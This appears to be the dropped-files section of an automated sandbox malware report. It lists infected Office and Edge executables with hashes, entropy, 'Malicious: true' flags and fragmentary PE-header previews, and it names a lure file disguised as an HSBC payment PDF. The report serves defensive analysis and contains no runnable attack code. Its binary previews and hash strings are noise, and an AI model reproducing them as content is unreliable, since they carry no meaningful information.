Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@..........................0$.....u............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961763917279669
Encrypted:	false
SSDEEP:	1572864:8KjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:ficZmsR3Lo/cnLe
MD5:	EAA34A21AC909195C536A813EAC92B4B
SHA1:	27E626F1DBE8549895F48D44C96D5BEC20C5944E
SHA-256:	B335872559177ADB0A2BAF35482432E850F5C8E209A09FFBB4479F241BC21A05
SHA-512:	0C720671D3747DA5E2A7440EB9D824F1EBD4014CC162374F46B49C9F848605E40C9A4E9760D5A51AEF2C63523FAD2B7881121294BE1BBB6996CEC2EAA200EDB5
Malicious:	true
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.808584823090034
Encrypted:	false
SSDEEP:	98304:OlkkCqyDEY7+o3OBvfGVY+40yaHyS+9s/pL57wRGpj3:gkkCqaE68eV+0yAE6LNF9
MD5:	D70A770C88DEE7EE06CB351BC2A19E91
SHA1:	3EC9DE04F6A28B5F28F7084BCA3A392B17716BC4
SHA-256:	EC6C910762FCA2FD81C20B625BAE79835852F248A3307F458F0185429C9FE571
SHA-512:	FAA96A037A140BE4FA3116F206D089218AF0ADD459E3A8B95C310945F7C6AEE843A72E74DE0CE76B5389451FCAD0DAED4481D85136FD10DEA4173CFDC3A4E43A
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ....Z........%......`+...@..........................pL.....M.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text............................. ..`.rdata........+....................@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1324032
Entropy (8bit):	4.552836331506266
Encrypted:	false
SSDEEP:	12288:niJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:T/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	0A3F4ED3F406DE72A4F5270AA6947744
SHA1:	36D7DEC938FD24ACF67B01B01836168971A4016E
SHA-256:	0FC07AAF65418128B33F85B828EB1FD72815D9A06A72915C88D770F962A73269
SHA-512:	6797EEE3F74102CBB24DB12C6FED4161CACBE1E0C5680932B900F67CD7E10F84BD0D00B529E59D10882167580C7988103FFF04771F047712784F5CB08D099C00
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.......................... .......q..................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1678336
Entropy (8bit):	4.929857930724147
Encrypted:	false
SSDEEP:	24576:JyAAWSS2Htn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JIUMtnLNiXicJFFRGNzj3
MD5:	D018659094538714815D84D770DEF8F7
SHA1:	FA216116F3E3C5F98C02E8A43487BC00BDD1017C
SHA-256:	FCD704A815CEC5FAA18CE0D32843BE26C22AE7A8B4980F5603ED8B21A26C57E7
SHA-512:	AA9274A93C3015578E89D87BB45499E9CA4749E88E761EC2B0B39FC53767810251457F07DB2C1A7A8C280494007BC22E8D61FD3EC87C652151FE2EB2596BF66F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@...........................$.....\|...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1449472
Entropy (8bit):	4.755795427673539
Encrypted:	false
SSDEEP:	24576:7SW/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XLNiXicJFFRGNzj3
MD5:	3A337EF0A081C0E93DF402E0B4FADEE7
SHA1:	3EF4C6D3623BCA6A482A3990A93F4C9B0E331C95
SHA-256:	A265F93B62DE59E4954069631503960B5FCBB7F70D5B24814F0C7224D2B2E5B3
SHA-512:	1B87CA49CA99C98EAD41BCBA42207391400139D86B5EBFA885A4AAB8A94849F9E44A7256BB1FEBDFBFADBFFB2E589DADB8087C218A19BA29BF747A83CAB3BBE7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@...........................!..............................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..\|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...............^..............@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1303552
Entropy (8bit):	4.540786673682422
Encrypted:	false
SSDEEP:	12288:D0CiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	AB8CF65AAA4673B98B9A6CC1F628F21A
SHA1:	A7A8FA45EBBEE0ABCA0DB0310280946904AC7F5F
SHA-256:	C0F8E136BF6AA6083174A53FCD58433C73FDCE37335AEE9C9E5C97FB32491043
SHA-512:	A3F2D6FAE6074E90BB659C775F5AFDED98636382C8F33336AAE8160D17993BF7A7487FA5FAD40BE669A07E1EA6E012A396072C4007929961676FB5E592ADD3E6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@.................................#........................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...`...........D..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1574400
Entropy (8bit):	4.964249638920812
Encrypted:	false
SSDEEP:	24576:aAZHHrUZF/S/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ae4ZFSLNiXicJFFRGNzj3
MD5:	4DCC98AC1D46C21D9A3D4AEFD208835D
SHA1:	8026ABE75EC8985DA7D70C83CAACEED24DC11231
SHA-256:	EB383ACC40EA5A25D666DEA2FBFF15A1C10C6E0EC9C72D0C16377D99E8FCBF08
SHA-512:	EEED75E6CF1BA4C3B7C1AA134D7169FAB8DACD87BDD530B16040808FB58F9D047CB3D5114583938513F05C6259135C1B78C10E5246056C6F6D4858ED8483A84E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@...........................#.................................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...............F..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53721600
Entropy (8bit):	6.54317915836547
Encrypted:	false
SSDEEP:	1572864:3NVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:3Q9lw68HSq
MD5:	CADBBCBB27B88BE2DA1DD7412F2680EC
SHA1:	0DA29A89FCB609C675260E2908B1C0E381E76CB0
SHA-256:	27A220EFF36450609488205E35DA388926205716F58742449D51DA2B5685F2AD
SHA-512:	D6EF68AD5A8C330712279FC5699884CBFEDFF0876AAC8831DE8FF24F873D2007E1B95C87203E29C42C38E39E3AB1EAFF99926F18CADFEF4F713DE803B6F7F851
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9\|..8.r.9\|..8;r.9\|..8.r.9\|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.....B14.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40811520
Entropy (8bit):	6.461244881832736
Encrypted:	false
SSDEEP:	786432:LbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ay3I5:LyM8TOtIlPv+msZPH1u5WkID5uceo4qR
MD5:	A40E14E5DB7EA69C438FB74698490529
SHA1:	33F421FAC0AC214A0DFCA0B97C8159A7650EDB22
SHA-256:	E9BA6F492B030B89CD9AE6654A18182A2A13EC6E43937CD862BC09726720FF39
SHA-512:	86A7EA9572287C517666F9B59526F28F2EFABF8C9600D5AB88497C05A60A35799CD6D54561871A8A296EA8F6955BA37510E09266421441D7794FEFBF47596C8C
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.....}Yo.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....\|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...\|S.............@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1812992
Entropy (8bit):	5.250011878263401
Encrypted:	false
SSDEEP:	24576:jd8DMeflpnIOvYU+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jCDD9pnIOILNiXicJFFRGNzj3
MD5:	C74A51FA4C47E06A8C0AEAF712199D55
SHA1:	03202C224DCEE4734E85C8CBD0538783A2580F9F
SHA-256:	C1A1957346AB68D8DEF1FF0C4AEBA948AB67F441E785B741D3121B9937FD58DE
SHA-512:	B9C1E94926E980F7919E6D50E95C6CCF880B34E9635D0AA780CEFBF520FE70F5AF873EED8BE74EEF35D1181F13510D5B3B4BCDAD49DD7EC7D3A14E63470C56A8
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'.....Y..... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.74565878077737
Encrypted:	false
SSDEEP:	49152:ZB1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8EbLNiXicJFFRGN:FHzorVmr2gkRpdJYol57wRGpj3
MD5:	746F4730761B3763DDCA5C9A8359E9A4
SHA1:	D3162A2E0A02EAE77BBB1ECBF7AAEED98B91709E
SHA-256:	1543E02882344222735FF591DF45F4B95E8AE7B0D5CBCB6AEEBF6B8F0B25F5BD
SHA-512:	1181260A94FAB09A40FE180275B1DE00306E8A55424905F431FE417680C9FB9423452E1840E066609698793E45D281B41FAE9763AE4F34471E8212C035AFC01C
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....#.B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1394176
Entropy (8bit):	4.671290151414822
Encrypted:	false
SSDEEP:	24576:1EyT4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CykLNiXicJFFRGNzj3
MD5:	9DDB34000EC21F47165895942CB77B36
SHA1:	F1939D3B8CB2C724BB88F4C7A02135357AC3040C
SHA-256:	9AB060FA2FF246A76639700156EB32ED1DF851E15E2F730F2035A1F1B0CCFB30
SHA-512:	74CDE48EE42EDECECA02CBDDB906F668F40EAFD8EA0E53C59D52002D63FFAABABCE2A1CF6766849A454AEB95697BCD5A8ED9E2D2E6B97F7997F08BEE7768F079
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` ........... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.045028636203606
Encrypted:	false
SSDEEP:	49152:khDdVrQ95RW0YQHyWQXE/09Val0GfLNiXicJFFRGNzj3:khHYWmHyWKo7wRGpj3
MD5:	F84F1E7B5D6E2F37D74AEEBB5944088A
SHA1:	047F31F8265CF2D93707B1381FBBAFC45CADCF8A
SHA-256:	AC9D8D344CB48F85CDFF8DC654896BEEC612C4AEB02A878951697E5FE8F5AA9F
SHA-512:	59211600A7E5F93E192BCB883F6A3C4B177AA3AB0A91B56BE1C0FB9A7AC42F863FF4C6A5C01B011E3C978F6B95B216BE4FCE098C48D0C34902CAF5EEEE732E50
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.1521031518496665
Encrypted:	false
SSDEEP:	24576:O70E0ZCQZMib6Rrt9RoctGfmddr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:q0EzQS7RPRoc1vLNiXicJFFRGNzj3
MD5:	051BDBC2664F382456D975452C5C3302
SHA1:	DC0E769A89A0F8F69B15B2B6A0AD88E8793BF1A7
SHA-256:	E4944D88CE8BDCC535BD6779F95B7207F1EB15F8B2DE92A36682E3E918898C57
SHA-512:	FCAA17CEC2D88CCC5B04F15B82A763046BC43AF035DA78F4AC375AC00A3130FC5960349E3CE3530BD63D985A584040BB3CE3AC058DCF6E13C06515AABD976679
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.139185583107716
Encrypted:	false
SSDEEP:	24576:7iD2VmA1YXiHwlklb8boUuWPg2gE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WD2VmAygwIb8boQ7LNiXicJFFRGNzj3
MD5:	981D233BDA018679E25BF118B512769E
SHA1:	01F97D0903F077CA0FD87BA01BB49A5B5EF48A96
SHA-256:	4A10BAC598040072F65AB37C8631CAF622C2C5641F98DDB01525C899DA0A4B79
SHA-512:	7906BAD6C8C1797CAA9ECCBBD47EA8DE1A95C6D0433D19615CD942745EDBA318177738C863E5EB88AC1A7009EAF1A1864D53D367E04BE2C7067E7A25D8858FA1
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p........... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.946967601898855
Encrypted:	false
SSDEEP:	49152:JfD3zO9ZhBGlohzM3HRNr00DLNiXicJFFRGNzj3:dDaalSzM00D7wRGpj3
MD5:	18DEB2F5AB5DBAA58605F0E8EC7D83F3
SHA1:	C70DE3DD3C65F0AABF102516F21ADF44088E8028
SHA-256:	3A2886272830719578D6EB44C0A9E95CB60C3918A045C740018F7781E7E78D6F
SHA-512:	A89A2DE2F922E6D366CCE121B59D96A05EE4EEB5E4CC75A038054AFCE840977D258F2DF7A1727D39C45A40C3132AB55D6A53787421E8E460D76665D7269F9778
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.821915337591479
Encrypted:	false
SSDEEP:	49152:/TaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhALNiXicJy:GI72Lvkr4pbxJRoIMr7wRGpj3
MD5:	BE0415DA428775A75806D56B7E7CAED2
SHA1:	9CEA1C67122661627A6E36F2A2DC56FBF21DB7B5
SHA-256:	D8DF9BF69F0AB98C65736840E805136D00B8C5D096458A9B89F182E0E84F731D
SHA-512:	55DA9D240410602C7C078C9FB9C591C7242489E528774169BF07F8488131DC72B2E2775C41D6B06C308150635F21678CFF46E823F15A3110E8F05DBA6E382FE9
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.091538291206182
Encrypted:	false
SSDEEP:	24576:TW9Jml9mmijxiMnF+ZxmQWcbLw8Vb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TWnm5iAMkjmQWkVbLNiXicJFFRGNzj3
MD5:	AB388F416281B6DA5E9204F995713D68
SHA1:	A7118CD701C08A1B4945FF675F76C879718777C1
SHA-256:	88C94016138447966A2F154DF209B037F0591CC8D5E44A6807C241F2AA598828
SHA-512:	EB23C43F11774F21941050B3EC6041176A2226704B3FD57376745A0174434A096549059EA6C96667D0644C6E8545526545142B560208BCB5E877E0E5E66D81BD
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.1599005708222885
Encrypted:	false
SSDEEP:	24576:swNHwoYhua6MZERO4qbBJTY6mY1uIgx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:swNPdNO7BJTfmE2LNiXicJFFRGNzj3
MD5:	3FD8264AA2DC2185CACAA5621E6E5EAA
SHA1:	801B19C39358E0679D95840A4A195463AE296F05
SHA-256:	C85BAA3B4EC2C54281349CA38E7890915353BCE046A1475B8AE4A89F0AAF41B6
SHA-512:	99C69D8B44F6A98F5F534DBC32BCFC79D864141C62AEBF9CC43F6B01E36B8D43E6E936708636C00F8EBA979848CCD0C52F696E7FA1152AE90CA05CE3C1B11404
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.139184361939817
Encrypted:	false
SSDEEP:	24576:0iD2VmA1YXiHwlklb8boUuWPg2gE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3D2VmAygwIb8boQ7LNiXicJFFRGNzj3
MD5:	BD0B54B6E35B5EE7E1FBAB97E9D7885F
SHA1:	51AF938940268905BDEF575BBD8BF9B79BDE6FFE
SHA-256:	55A71C3129FE4AC53FF5529FAA3B18365E086B905D4E6F5FA10AC7C8BF3B2CCC
SHA-512:	796D60C84EFF29A30ED422FA658A4B652D09699E06A493388630AD339CC3726260AA081816D3AA077A0064A3D01CC94EF72B8F80D0828E8075B9C84899C05CB2
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
